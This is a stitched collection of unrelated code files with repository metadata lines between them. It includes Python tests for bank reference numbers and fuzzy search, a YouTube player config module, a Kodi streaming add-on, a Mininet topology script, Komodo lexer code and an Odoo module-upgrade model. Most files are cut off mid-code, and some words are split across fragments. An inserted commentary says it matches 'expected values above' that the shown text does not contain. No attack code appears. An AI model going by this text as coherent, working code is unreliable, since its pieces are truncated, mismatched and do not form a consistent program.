def test_iso_reference_isvalid_invalid_results():
    assert not iso_reference_isvalid('RF40C2H5OH')


def test_str2iso_reference_random_integers():
    for x in range(1000):
        testint = random.randint(1, 2**24)
        reference = str2iso_reference(str(testint))
        assert iso_reference_isvalid(reference)


def test_str2iso_reference_random_strings():
    for x in range(1000):
        teststr = ''
        for y in range(5, 14):
            teststr += random.choice(ISO_REFERENCE_VALID)
        reference = str2iso_reference(teststr)
        assert iso_reference_isvalid(reference)
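For context on what these fixtures encode: the standard Finnish bank reference check digit applies weights 7, 3, 1 right-to-left and rounds the sum up to the next multiple of ten. This sketch is my own (an assumption about holviapi's internals, but it reproduces the expected values above):

    def fin_check_digit(base):
        # Weights 7, 3, 1 applied to the digits from right to left.
        weights = [7, 3, 1]
        total = sum(int(d) * weights[i % 3]
                    for i, d in enumerate(reversed(str(base))))
        return (10 - total % 10) % 10

    assert fin_check_digit(1) == 3       # matches int2fin_reference(1) == '13'
    assert fin_check_digit(10) == 7      # matches int2fin_reference(10) == '107'
    assert fin_check_digit(10552) == 3   # matches '105523'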
welblade/pyrom
test/__init__.py
Python
mit
49
0
#!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
awslabs/aws-shell
tests/unit/test_fuzzy.py
Python
apache-2.0
629
0
import pytest

from awsshell.fuzzy import fuzzy_search


@pytest.mark.parametrize("search,corpus,expected", [
    ('foo', ['foobar', 'foobaz'], ['foobar', 'foobaz']),
    ('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']),
    ('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']),
    ('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']),
    # The more chars it matches, the higher the score.
    ('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']),
    ('nomatch', ['noma', 'nomatccc'], []),
])
def test_subsequences(search, corpus, expected):
    actual = fuzzy_search(search, corpus)
    assert actual == expected
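A minimal sketch of the subsequence property these cases exercise (my illustration, not aws-shell's actual implementation, which additionally scores and ranks matches): every search character must appear in the candidate, in order, with gaps allowed.

    def is_subsequence(search, candidate):
        # 'in' on an iterator consumes it, so matches must occur in order.
        it = iter(candidate)
        return all(ch in it for ch in search)

    assert is_subsequence('fbb', 'foo-bar-baz')
    assert not is_subsequence('nomatch', 'noma')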
uogbuji/akara
test/setup_scripts/setup_basic.py
Python
apache-2.0
108
0.009259
from akara.dist import setup

setup(name="basic",
      version="1.0",
      akara_extensions=["blah.py"]
      )
np1/mps-youtube
mps_youtube/config.py
Python
gpl-3.0
13,150
0.001217
import os
import re
import sys
import copy
import pickle

from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.parse import urlencode

try:
    import pylast
    has_pylast = True
except ImportError:
    has_pylast = False

import pafy

from . import g, c, paths, util


mswin = os.name == "nt"


class ConfigItem:

    """ A configuration item. """

    def __init__(self, name, value, minval=None, maxval=None, check_fn=None,
                 require_known_player=False, allowed_values=None):
        """ If specified, the check_fn should return a dict.

        {valid: bool, message: success/fail message, value: value to set}

        """
        self.default = self.value = value
        self.name = name
        self.type = type(value)
        self.maxval, self.minval = maxval, minval
        self.check_fn = check_fn
        self.require_known_player = require_known_player
        self.allowed_values = []
        if allowed_values:
            self.allowed_values = allowed_values

    @property
    def get(self):
        """ Return value. """
        return self.value

    @property
    def display(self):
        """ Return value in a format suitable for display. """
        retval = self.value

        if self.name == "max_res":
            retval = str(retval) + "p"

        if self.name == "encoder":
            retval = str(retval) + " [%s]" % (str(g.encoders[retval]['name']))

        return retval

    def set(self, value):
        """ Set value with checks. """
        # note: fail_msg should contain %s %s for self.name, value
        #       success_msg should not
        # pylint: disable=R0912
        # too many branches
        success_msg = fail_msg = ""
        value = value.strip()
        value_orig = value

        # handle known player not set
        if self.allowed_values and value not in self.allowed_values:
            fail_msg = "%s must be one of * - not %s"
            allowed_values = copy.copy(self.allowed_values)
            if '' in allowed_values:
                allowed_values[allowed_values.index('')] = "<nothing>"
            fail_msg = fail_msg.replace("*", ", ".join(allowed_values))

        if self.require_known_player and \
                not util.is_known_player(Config.PLAYER.get):
            fail_msg = "%s requires mpv or mplayer, can't set to %s"

        # handle true / false values
        elif self.type == bool:

            if value.upper() in "0 OFF NO DISABLED FALSE".split():
                value = False
                success_msg = "%s set to False" % c.c("g", self.name)

            elif value.upper() in "1 ON YES ENABLED TRUE".split():
                value = True
                success_msg = "%s set to True" % c.c("g", self.name)

            else:
                fail_msg = "%s requires True/False, got %s"

        # handle int values
        elif self.type == int:

            if not value.isdigit():
                fail_msg = "%s requires a number, got %s"

            else:
                value = int(value)

                if self.maxval and self.minval:

                    if not self.minval <= value <= self.maxval:
                        m = " must be between %s and %s, got "
                        m = m % (self.minval, self.maxval)
                        fail_msg = "%s" + m + "%s"

                if not fail_msg:
                    dispval = value or "None"
                    success_msg = "%s set to %s" % (c.c("g", self.name),
                                                    dispval)

        # handle space separated list
        elif self.type == list:
            success_msg = "%s set to %s" % (c.c("g", self.name), value)
            value = value.split()

        # handle string values
        elif self.type == str:
            dispval = value or "None"
            success_msg = "%s set to %s" % (c.c("g", self.name),
                                            c.c("g", dispval))

        # handle failure
        if fail_msg:
            failed_val = value_orig.strip() or "<nothing>"
            colvals = c.y + self.name + c.w, c.y + failed_val + c.w
            return fail_msg % colvals

        elif self.check_fn:
            checked = self.check_fn(value)
            value = checked.get("value") or value

            if checked['valid']:
                value = checked.get("value", value)
                self.value = value
                Config.save()
                return checked.get("message", success_msg)

            else:
                return checked.get('message', fail_msg)

        elif success_msg:
            self.value = value
            Config.save()
            return success_msg


def check_console_width(val):
    """ Show ruler to check console width. """
    valid = True
    message = "-" * val + "\n"
    message += "console_width set to %s, try a lower value if above line "\
        "overlaps" % val
    return dict(valid=valid, message=message)


def check_api_key(key):
    """ Validate an API key by calling an API endpoint with no quota cost """
    url = "https://www.googleapis.com/youtube/v3/i18nLanguages"
    query = {"part": "snippet", "fields": "items/id", "key": key}

    try:
        urlopen(url + "?" + urlencode(query)).read()
        message = "The key, '" + key + "' will now be used for API requests."

        # Make pafy use the same api key
        pafy.set_api_key(Config.API_KEY.get)
        return dict(valid=True, message=message)

    except HTTPError:
        message = "Invalid key or quota exceeded, '" + key + "'"
        return dict(valid=False, message=message)


def check_ddir(d):
    """ Check whether dir is a valid directory. """
    expanded = os.path.expanduser(d)
    if os.path.isdir(expanded):
        message = "Downloads will be saved to " + c.y + d + c.w
        return dict(valid=True, message=message, value=expanded)

    else:
        message = "Not a valid directory: " + c.r + d + c.w
        return dict(valid=False, message=message)


def check_win_pos(pos):
    """ Check window position input. """
    if not pos.strip():
        return dict(valid=True, message="Window position not set (default)")

    pos = pos.lower()
    reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)"

    if not re.match(reg, pos, re.I):
        msg = "Try something like top-left or bottom-right (or default)"
        return dict(valid=False, message=msg)

    else:
        p = re.match(reg, pos, re.I).groups()
        p = "%s-%s" % p
        msg = "Window position set to %s" % p
        return dict(valid=True, message=msg, value=p)


def check_win_size(size):
    """ Check window size input. """
    if not size.strip():
        return dict(valid=True, message="Window size not set (default)")

    size = size.lower()
    reg = r"\d{1,4}x\d{1,4}"

    if not re.match(reg, size, re.I):
        msg = "Try something like 720x480"
        return dict(valid=False, message=msg)

    else:
        return dict(valid=True, value=size)


def check_encoder(option):
    """ Check encoder value is acceptable. """
    encs = g.encoders

    if option >= len(encs):
        message = "%s%s%s is too high, type %sencoders%s to see valid values"
        message = message % (c.y, option, c.w, c.g, c.w)
        return dict(valid=False, message=message)

    else:
        message = "Encoder set to %s%s%s"
        message = message % (c.y, encs[option]['name'], c.w)
        return dict(valid=True, message=message)


def check_player(player):
    """ Check player exefile exists and get mpv version. """
    if util.has_exefile(player):
        print(player)
        util.assign_player(player)

        if "mpv" in player:
            version = "%s.%s.%s" % g.mpv_version
            fmt = c.g, c.w, c.g, c.w, version
            msg = "%splayer%s set to %smpv%s (version %s)" % fmt
            return dict(valid=True, message=msg, value=player)

        else:
            msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w)
            return dict(valid=True, message=msg, value=player)

    else:
        if mswin and not (player.endswith(".exe") or player.endswith(".com")):
            # Using mpv.exe has issues; use mpv.com
delletenebre/xbmc-addon-kilogramme
plugin.video.kilogramme/resources/lib/site_ockg.py
Python
gpl-3.0
20,423
0.0036
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2, re, json, time, xbmc, traceback

from _header import *

BASE_URL = 'http://cinemaonline.kg/'
BASE_NAME = 'Cinema Online'
BASE_LABEL = 'oc'
GA_CODE = 'UA-34889597-1'
NK_CODE = '1744'


def default_oc_noty():
    plugin.notify('Сервер недоступен', BASE_NAME, image=get_local_icon('noty_' + BASE_LABEL))


def get_oc_cookie():
    result = {'phpsessid': '', 'utmp': '', 'set': ''}
    cookie = plugin.get_storage(BASE_LABEL, TTL=1440)
    try:
        result['phpsessid'] = cookie['phpsessid']
        result['utmp'] = cookie['utmp']
        result['set'] = cookie['set']
    except:
        try:
            a = common.fetchPage({'link': BASE_URL})
            b = common.fetchPage({'link': BASE_URL + 'cinema.png?' + str(int(time.time()))})
            cookie['set'] = a['header']['Set-Cookie'] + '; ' + b['header']['Set-Cookie']
            result['set'] = cookie['set']
            cookies = common.getCookieInfoAsHTML()
            cookie['phpsessid'] = common.parseDOM(cookies, 'cookie', attrs={'name': 'PHPSESSID'}, ret='value')[0]
            try:
                cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '_utmp'}, ret='value')[0]
            except:
                cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '__utmp'}, ret='value')[0]
            result['phpsessid'] = cookie['phpsessid']
            result['utmp'] = cookie['utmp']
        except:
            pass
    return result


COOKIE = ''  # get_oc_cookie()
BASE_API_URL = BASE_URL + 'api.php?format=json'  # &' + COOKIE['phpsessid'] + '&JsHttpRequest='+str(int(time.time()))+'-xml'


@plugin.route('/site/' + BASE_LABEL)
def oc_index():
    items = [{
        'label': set_color('[ Поиск ]', 'dialog', True),
        'path': plugin.url_for('oc_search'),
        'icon': get_local_icon('find')
    }, {
        'label': set_color('Новинки на CinemaOnline', 'light'),
        'path': plugin.url_for('oc_category', id=0)
    }, {
        'label': set_color('По жанрам', 'bold'),
        'path': plugin.url_for('oc_genres')
    }, {
        'label': 'Бестселлеры',
        'path': plugin.url_for('oc_bestsellers')
    }, {
        'label': 'Лучшие по версии IMDB',
        'path': plugin.url_for('oc_category', id=2)
    }, {
        'label': 'Лучшие по версии КиноПоиск',
        'path': plugin.url_for('oc_category', id=9)
    }]
    return items


@plugin.route('/site/' + BASE_LABEL + '/genre')
def oc_genres():
    item_list = get_genres()
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_genre', id=item['id'])
    } for item in item_list]
    return items


@plugin.route('/site/' + BASE_LABEL + '/bestsellers')
def oc_bestsellers():
    item_list = get_bestsellers()
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_movie', id=item['id']),
        'icon': item['icon'],
    } for item in item_list]
    return items


@plugin.route('/site/' + BASE_LABEL + '/genre/<id>')
def oc_genre(id):
    item_list = get_genre_movie_list(id)
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_movie', id=item['id']),
        'properties': item['properties'],
        'icon': item['icon'],
    } for item in item_list['items']]
    if (item_list['sys_items']):
        items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id)
    return items


@plugin.route('/site/' + BASE_LABEL + '/genre/<id>/<page>')
def oc_genre_pagination(id, page='1'):
    page = int(page)
    item_list = get_genre_movie_list(id, page)
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_movie', id=item['id']),
        'properties': item['properties'],
        'icon': item['icon'],
    } for item in item_list['items']]
    if (item_list['sys_items']):
        items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id)
    return plugin.finish(items, update_listing=True)


@plugin.route('/site/' + BASE_LABEL + '/category/<id>')
def oc_category(id):
    item_list = get_movie_list(id)
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_movie', id=item['id']),
        'properties': item['properties'],
        'icon': item['icon'],
    } for item in item_list['items']]
    if (item_list['sys_items']):
        items = add_pagination(items, item_list['sys_items'], 'oc_category_pagination', id)
    return items


@plugin.route('/site/' + BASE_LABEL + '/category/<id>/<page>')
def oc_category_pagination(id, page='1'):
    page = int(page)
    item_list = get_movie_list(id, page)
    items = [{
        'label': item['label'],
        'path': plugin.url_for('oc_movie', id=item['id']),
        'properties': item['properties'],
        'icon': item['icon'],
    } for item in item_list['items']]
    if (item_list['sys_items']):
        items = add_pagination(items, item_list['sys_items'], 'oc_category_pagination', id)
    return plugin.finish(items, update_listing=True)


@plugin.route('/site/' + BASE_LABEL + '/to_page/category/<id>/<page>')
def oc_go_to_page(id, page=1):
    search_page = common.getUserInputNumbers('Укажите страницу')
    if (search_page):
        search_page = int(search_page) - 1 if (int(search_page) > 0) else 1
        item_list = get_movie_list(id, search_page)
        items = [{
            'label': item['label'],
            'path': plugin.url_for('oc_movie', id=item['id']),
            'properties': item['properties'],
            'icon': item['icon'],
        } for item in item_list['items']]
        if (item_list['sys_items']):
            for item in item_list['sys_items']:
                items.insert(0, {
                    'label': item['label'],
                    'path': plugin.url_for('oc_go_to_page', id=id, page=item['page']) if (
                        item['search'] == True
                    ) else plugin.url_for('oc_category_pagination', id=id, page=item['page']),
                    'icon': item['icon']
                })
        return plugin.finish(items, update_listing=True)
    else:
        plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL + '/category/' + id + '/' + str(int(page) - 1))


@plugin.route('/site/' + BASE_LABEL + '/movie/<id>')
def oc_movie(id):
    item_list = get_movie(id)
    # xbmc.log('Item list: ' + str(item_list))
    items = [{
        # 'title' : item['label'],
        'label': item['label'],
        'path': item['url'],
        'thumbnail': item['icon'],
        'properties': item['properties'],
        'is_playable': True
    } for item in item_list['items']]
    if (item_list['playlist']):
        # xbmc.log('Item list play: ' + str(item_list['items']))
        kgontv_playlist(item_list['items'])
        xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')
    else:
        # xbmc.log('Item play: ' + str(items))
        return items


@plugin.route('/site/' + BASE_LABEL + '/search')
def oc_search():
    search_val = plugin.keyboard('', 'Что ищете?')
    if (search_val):
        item_list = get_search_results(str(search_val))
        items = [{
            'label': item['label'],
            'path': plugin.url_for('oc_movie', id=item['id']),
            'icon': item['icon'],
        } for item in item_list]
        return items
    else:
        plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL)


# method
def get_bestsellers():
    items = []
    try:
        result = common.fetchPage({'link': BASE_API_URL, 'post_data': {'action[0]': 'Vide
opennetworkinglab/spring-open
old-scripts/test-network/mininet/net.sprint5-templete.py
Python
apache-2.0
4,452
0.02628
#!/usr/bin/python

NWID=1
NR_NODES=20
#Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}]
Controllers=[{"ip":'10.0.1.28', "port":6633}]

"""
Start up a Simple topology
"""
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info, error, warn, debug
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from mininet.link import Link, TCLink

from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE

import sys
#import argparse

class MyController( Controller ):
    def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs):
        """Init.
           name: name to give controller
           ip: the IP address where the remote controller is listening
           port: the port where the remote controller is listening"""
        Controller.__init__( self, name, ip=ip, port=port, **kwargs )

    def start( self ):
        "Overridden to do nothing."
        return

    def stop( self ):
        "Overridden to do nothing."
        return

    def checkListening( self ):
        "Warn if remote controller is not accessible"
        listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) )
        if 'Unable' in listening:
            warn( "Unable to contact the remote controller"
                  " at %s:%d\n" % ( self.ip, self.port ) )

class SDNTopo( Topo ):
    "SDN Topology"

    def __init__( self, *args, **kwargs ):
        Topo.__init__( self, *args, **kwargs )

        switch = []
        host = []
        root = []

        for i in range (NR_NODES):
            name_suffix = '%02d' % NWID + "." + '%02d' % i
            dpid_suffix = '%02x' % NWID + '%02x' % i
            dpid = '0000' + '0000' + '0000' + dpid_suffix
            sw = self.addSwitch('sw'+name_suffix, dpid=dpid)
            switch.append(sw)

        for i in range (NR_NODES):
            host.append(self.addHost( 'host%d' % i ))

        for i in range (NR_NODES):
            root.append(self.addHost( 'root%d' % i, inNamespace=False ))

        for i in range (NR_NODES):
            self.addLink(host[i], switch[i])

        for i in range (1, NR_NODES):
            self.addLink(switch[0], switch[i])

        for i in range (NR_NODES):
            self.addLink(root[i], host[i])

def startsshd( host ):
    "Start sshd on host"
    info( '*** Starting sshd\n' )
    name, intf, ip = host.name, host.defaultIntf(), host.IP()
    banner = '/tmp/%s.banner' % name
    host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) )
    host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' )
    info( '***', host.name, 'is running sshd on', intf, 'at', ip, '\n' )

def startsshds ( hosts ):
    for h in hosts:
        startsshd( h )

def stopsshd( ):
    "Stop *all* sshd processes with a custom banner"
    info( '*** Shutting down stale sshd/Banner processes ',
          quietRun( "pkill -9 -f Banner" ), '\n' )

def sdnnet(opt):
    topo = SDNTopo()
    info( '*** Creating network\n' )
    #net = Mininet( topo=topo, controller=MyController, link=TCLink)
    net = Mininet( topo=topo, link=TCLink, build=False)
    controllers=[]
    for c in Controllers:
        rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port'])
        print "controller ip %s port %s" % (c['ip'], c['port'])
        controllers.append(rc)

    net.controllers=controllers
    net.build()

    host = []
    for i in range (NR_NODES):
        host.append(net.get( 'host%d' % i ))

    net.start()

    sw=net.get('sw01.00')
    print "center sw", sw
    sw.attach('tapa0')

    for i in range (NR_NODES):
        host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i))

    root = []
    for i in range (NR_NODES):
        root.append(net.get( 'root%d' % i ))

    for i in range (NR_NODES):
        host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i)
        root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i)

    stopsshd ()
    startsshds ( host )

    if opt=="cli":
        CLI(net)
        stopsshd()
        net.stop()

if __name__ == '__main__':
    setLogLevel( 'info' )
    if len(sys.argv) == 1:
        sdnnet("cli")
    elif len(sys.argv) == 2 and sys.argv[1] == "-n":
        sdnnet("nocli")
    else:
        print "%s [-n]" % sys.argv[0]
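The topology above is a star: every switch links back to switch 0 and each host hangs off its own switch. A minimal sketch of the same shape, assuming a standard Mininet install with the newer Topo.build() hook (names are illustrative):

    from mininet.topo import Topo

    class StarTopo(Topo):
        # One hub switch, n leaf switches, one host per leaf.
        def build(self, n=4):
            hub = self.addSwitch('s0')
            for i in range(1, n + 1):
                leaf = self.addSwitch('s%d' % i)
                self.addLink(hub, leaf)
                self.addLink(self.addHost('h%d' % i), leaf)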
anisku11/sublimeku
Packages/CodeComplice/libs/codeintel2/udl.py
Python
mit
23,772
0.000463
#!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
#   ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****

"""UDL (User-Defined Language) support for codeintel."""

import os
from os.path import dirname, join, abspath, normpath, basename, exists
import sys
import re
import logging
import threading
import operator
import traceback
from pprint import pprint, pformat

import SilverCity
from SilverCity import ScintillaConstants
from SilverCity.ScintillaConstants import *  # XXX import only what we need
from SilverCity.Lexer import Lexer

from codeintel2.common import *
from codeintel2.citadel import CitadelBuffer
# from codeintel2.javascript_common import trg_from_pos as
# javascript_trg_from_pos

if _xpcom_:
    from xpcom import components
    from xpcom.server import UnwrapObject
    import directoryServiceUtils

log = logging.getLogger("codeintel.udl")
# log.setLevel(logging.DEBUG)

# XXX We need to have a better mechanism for rationalizing and sharing
# common lexer style classes. For now we'll just HACKily grab from
# Komodo's styles.py. Some of this is duplicating logic in
# KoLanguageServiceBase.py.
_ko_src_dir = normpath(join(dirname(__file__), *([os.pardir]*3)))
sys.path.insert(0, join(_ko_src_dir, "schemes"))
try:
    import styles
finally:
    del sys.path[0]
    del _ko_src_dir


#---- module interface

# Test 'udl/general/is_udl_x_style' tests these.
def is_udl_m_style(style):
    return (ScintillaConstants.SCE_UDL_M_DEFAULT
            <= style
            <= ScintillaConstants.SCE_UDL_M_COMMENT)

def is_udl_css_style(style):
    return (ScintillaConstants.SCE_UDL_CSS_DEFAULT
            <= style
            <= ScintillaConstants.SCE_UDL_CSS_OPERATOR)

def is_udl_csl_style(style):
    return (ScintillaConstants.SCE_UDL_CSL_DEFAULT
            <= style
            <= ScintillaConstants.SCE_UDL_CSL_REGEX)

def is_udl_ssl_style(style):
    return (ScintillaConstants.SCE_UDL_SSL_DEFAULT
            <= style
            <= ScintillaConstants.SCE_UDL_SSL_VARIABLE)

def is_udl_tpl_style(style):
    return (ScintillaConstants.SCE_UDL_TPL_DEFAULT
            <= style
            <= ScintillaConstants.SCE_UDL_TPL_VARIABLE)


# XXX Redundant code from koUDLLanguageBase.py::KoUDLLanguage
# Necessary because SilverCity.WordList splits input on white-space
_re_bad_filename_char = re.compile(r'([% \x80-\xff])')

def _lexudl_path_escape(m):
    return '%%%02X' % ord(m.group(1))

def _urlescape(s):
    return _re_bad_filename_char.sub(_lexudl_path_escape, s)


class UDLLexer(Lexer):
    """LexUDL wants the path to the .lexres file as the first element of
    the first keywords list.
    """
    _lock = threading.Lock()
    _lexresfile_from_lang = None
    _extra_lexer_dirs = set()

    def __init__(self):
        self._properties = SilverCity.PropertySet()
        self._lexer = SilverCity.find_lexer_module_by_id(
            ScintillaConstants.SCLEX_UDL)
        lexres_path = _urlescape(self._get_lexres_path())
        log.debug("escaped lexres_path: %r", lexres_path)
        self._keyword_lists = [
            SilverCity.WordList(lexres_path),
        ]

    def tokenize_by_style(self, text, call_back=None):
        """LexUDL.cxx currently isn't thread-safe."""
        self._lock.acquire()
        try:
            return Lexer.tokenize_by_style(self, text, call_back)
        finally:
            self._lock.release()

    @staticmethod
    def add_extra_lexer_dirs(dirs):
        UDLLexer._extra_lexer_dirs.update(dirs)
        UDLLexer._lexresfile_from_lang = None

    if _xpcom_:
        # Presume we are running under Komodo. Look in the available
        # lexres dirs from extensions.
        @staticmethod
        def _generate_lexer_mapping():
            """Return dict {name > filename} of all lexer resource files
            (i.e. those ones that can include compiled UDL .lexres files).
            It yields directories that should "win" first.
            """
            from glob import glob
            lexresfile_from_lang = {}
            koDirs = components.classes["@activestate.com/koDirs;1"] \
                .getService(components.interfaces.koIDirs)

            # Find all possible lexer dirs.
            lexer_dirs = []
            lexer_dirs.append(join(koDirs.userDataDir, "lexers"))  # user
            for extensionDir in directoryServiceUtils.getExtensionDirectories():
                lexer_dirs.append(join(extensionDir, "lexers"))  # user-install extensions
            lexer_dirs.append(join(koDirs.commonDataDir, "lexers"))  # site/common
            lexer_dirs.append(join(koDirs.supportDir, "lexers"))  # factory
            for extra_dir in UDLLexer._extra_lexer_dirs:
                lexer_dirs.append(extra_dir)

            # Find all .lexres files in these lexer dirs.
            for d in reversed(lexer_dirs):  # first come, first served
                lexer_files = glob(join(d, "*.lexres"))
                for f in lexer_files:
                    # Get lowered name without the ".lexres" extension.
                    name = basename(f).lower().rsplit(".", 1)[0]
                    lexresfile_from_lang[name] = f
            return lexresfile_from_lang
    else:
        @staticmethod
        def _generate_lexer_mapping():
            """Return dict {name > filename} of all lexer resource files
            (i.e. those ones that can include compiled UDL .lexres files).
            It yields directories that should "win" first.
            """
            from glob import glob
            lexresfile_from_lang = {}

            # Find all possible lexer dirs.
            lexer_dirs = []
            lexer_dirs.append(join(dirname(__file__), "lexers"))
            for extra_dir in UDLLexer._extra_lexer_dirs:
                lexer_dirs.append(extra_dir)

            # Find all .lexres files in these lexer dirs.
            for d in reversed(lexer_dirs):  # first come, first served
                lexer_files = glob(join(d, "*.lexres"))
                for f in lexer_files:
                    # Get lowered name without the ".lexres" extension.
                    name = basename(f).lower().rsplit(".", 1)[0]
                    lexresfile_from_lang[name] = f
            return lexresfile_from_lang

    def _get_lexres_path(self):
        lexresfile_from_lang = UDLLexer._lexresfile_from_lang
        if lexresfile_from_lang is None:
            # Generate and cache it.
            lexresfile_from_lang = self._generate_lexer_mapping()
            UDLLexer._lexresfile_from_lang = lexresfile_from_lang
        lexres_file = lexresfile_from_lang.get(self.lang.
ddico/server-tools
module_auto_update/models/module.py
Python
agpl-3.0
6,204
0
# -*- coding: utf-8 -*- # Copyright 2017 LasLabs Inc. # Copyright 2018 ACSONE SA/NV. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import json import logging import os from openerp import api, exceptions, models, tools from openerp.modules.module import get_module_path from ..addon_hash import addon_hash PARAM_INSTALLED_CHECKSUMS = \ 'module_auto_update.installed_checksums' PARAM_EXCLUDE_PATTERNS = \ 'module_auto_update.exclude_patterns' DEFAULT_EXCLUDE_PATTERNS = \ '*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*' _logger = logging.getLogger(__name__) class FailedUpgradeError(exceptions.Warning): pass class IncompleteUpgradeError(exceptions.Warning): pass def ensure_module_state(env, modules, state): # read module states, bypassing any Odoo cache if not modules: return env.cr.execute( "SELECT name FROM ir_module_module " "WHERE id IN %s AND state != %s", (tuple(modules.ids), state), ) names = [r[0] for r in env.cr.fetchall()] if names: raise FailedUpgradeError( "The following modules should be in state '%s' " "at this stage: %s. Bailing out for safety." % (state, ','.join(names), ), ) class Module(models.Model): _inherit = 'ir.module.module' @api.multi def _get_checksum_dir(self): self.ensure_one() exclude_patterns = self.env["ir.config_parameter"].get_param( PARAM_EXCLUDE_PATTERNS, DEFAULT_EXCLUDE_PATTERNS, ) exclude_patterns = [p.strip() for p in exclude_patterns.split(',')] keep_langs = self.env['res.lang'].search([]).mapped('code') module_path = get_module_path(self.name) if module_path and os.path.isdir(module_path): checksum_dir = addon_hash( module_path, exclude_patterns, keep_langs, ) else: checksum_dir = False return checksum_dir @api.model def _get_saved_checksums(self): Icp = self.env['ir.config_parameter'] return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}')) @api.model def _save_checksums(self, checksums): Icp = self.env['ir.config_parameter'] Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums)) @api.model def _save_installed_checksums(self): checksums = {} installed_modules = self.search([('state', '=', 'installed')]) for module in installed_modules: checksums[module.name] = module._get_checksum_dir() self._save_checksums(checksums) @api.model def _get_modules_partially_installed(self): return self.search([ ('state', 'in', ('to install', 'to remove', 'to upgrade')), ]) @api.model def _get_modules_with_changed_checksum(self): saved_checksums = self._get_saved_checksums() installed_modules = self.search([('state', '=', 'installed')]) return installed_modules.filtered( lambda r: r._get_checksum_dir() != saved_checksums.get(r.name), ) @api.model def upgrade_changed_checksum(self, overwrite_existing_translations=False): """Run an upgrade of the database, upgrading only changed modules. Installed modules for which the checksum has changed since the last successful run of this method are marked "to upgrade", then the normal Odoo scheduled upgrade process is launched. If there is no module with a changed checksum, and no module in state other than installed, uninstalled, uninstallable, th
is method does nothing, otherwise the normal Odoo upgrade process is launched. After a successful upgrade, the checksums of installed modules are saved. In case of error during the upgrade, an exception is raised. If any module remains to upgrade or to uninstall after the upgrade process, an exception is raised as well. Note: this method commits the current transaction at each important s
tep, it is therefore not intended to be run as part of a larger transaction. """ _logger.info( "Checksum upgrade starting (i18n-overwrite=%s)...", overwrite_existing_translations ) tools.config['overwrite_existing_translations'] = \ overwrite_existing_translations _logger.info("Updating modules list...") self.update_list() changed_modules = self._get_modules_with_changed_checksum() if not changed_modules and not self._get_modules_partially_installed(): _logger.info("No checksum change detected in installed modules " "and all modules installed, nothing to do.") return _logger.info("Marking the following modules to upgrade, " "because their checksums changed: %s...", ','.join(changed_modules.mapped('name'))) changed_modules.button_upgrade() self.env.cr.commit() # pylint: disable=invalid-commit # in rare situations, button_upgrade may fail without # exception, this would lead to corruption because # no upgrade would be performed and save_installed_checksums # would update checksums for modules that have not been upgraded ensure_module_state(self.env, changed_modules, 'to upgrade') _logger.info("Upgrading...") self.env['base.module.upgrade'].upgrade_module() self.env.cr.commit() # pylint: disable=invalid-commit _logger.info("Upgrade successful, updating checksums...") self._save_installed_checksums() self.env.cr.commit() # pylint: disable=invalid-commit partial_modules = self._get_modules_partially_installed() if partial_modules: raise IncompleteUpgradeError( "Checksum upgrade successful " "but incomplete for the following modules: %s" % ','.join(partial_modules.mapped('name')) ) _logger.info("Checksum 